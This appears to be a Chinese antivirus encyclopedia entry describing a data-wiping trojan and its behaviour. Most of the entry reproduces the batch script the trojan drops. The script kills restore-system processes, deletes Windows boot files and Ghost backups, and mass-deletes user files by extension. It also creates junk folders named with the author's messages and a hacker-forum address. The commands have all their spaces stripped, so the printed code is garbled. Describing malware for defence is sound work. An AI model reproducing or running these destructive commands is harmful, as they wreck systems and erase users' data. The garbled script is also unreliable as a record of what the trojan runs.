病毒名称(中文):
病毒别名:
威胁级别:
★☆☆☆☆
病毒类型:
木马程序
病毒长度:
157606
影响系统:
Win9xWinMeWinNTWin2000WinXPWin2003
病毒行为:
这是一个恶意病毒,运行后释放出脚本文件删除用户电脑中绝大部分文件数据。
1、释放病毒脚本文件到%temp%目录下,并执行。
2、关闭影子系统,使病毒破坏的系统无法还原
taskkill/f/imshadowtip.exe
cls
taskkill/f/imshadowservice.exe
cls
taskkill/f/imshadowsetting.exe
3、删除文件
attribAUTOEXEC.BAT-s-h-r
cls
delAUTOEXEC.BAT/fy
cls
attribNTDETECT.COM-s-h-r
cls
delNTDETECT.COM/fy
cls
attribBOOTSECT.DOS-s-h-r
cls
delBOOTSECT.DOS/fy
cls
attribboot.ini-s-h-r
cls
delboot.ini/fy
cls
attribntldr-s-h-r
cls
delntldr/fy
cls
attrib收藏夹-s-h-r
rd/s/q收藏夹
attrib*-s-h-r
CLS
attribBOOT.INI-s-hr
delBOOT.INI/fy
cls
rd/s/qghost
rd/s/qKuGoo
attrib收藏夹-s-h-r
rd/s/q收藏夹
cls
del*.gho/fy
cls
del*.exe/fy
cls
del*.mp3/fy
cls
del*.txt/fy
cls
del*.jpg/fy
cls
del*.gif/fy
cls
del*.doc/fy
attribghost-s-h-r
rd/s/qghost
4、在各个盘下建立各种名字的目录:
mdD:\wcvcv44545433gdffdo.....mdD:\wfdgdfgdfg5656434o....mdD:\wfdgdfgfdg4334543o....mdD:\wosdfgfgfdggdfgdfdf....mdD:\w43345fgfdgdfgdfo....mdD:\wdfgdfgdfg3454343o....mdD:\wodgdfdfggdfg56564....mdD:\wssssbrtrrtr4ghr.....mdD:\伊泪..mdD:\QQ397551567.....mdD:\哇哈哈....mdD:\好爽....mdD:\请原谅我的暴力....mdD:\Abbb..mdD:\B.bb.mdD:\6bbb.mdD:\iiiiii..cls
mdD:\dfdsbbbf3333..mdD:\我真不想这样D........mdD:\我只想让你知道我不是菜鸟.......mdD:\作者伊泪........mdD:\请别把这个程序乱传播或用于非法活动本程序只提供学习用一切法律责任与本人无关........mdD:\newka@163.com....mdD:\很不错的一个黑客论坛www.hackwl.com.....mdD:\www.hackwl.com.....mdD:\sdsadsa32444f..mdD:\44333fsdfsdfs..mdD:\343fgdf44o..mdD:\325454sdfdsfdsf.....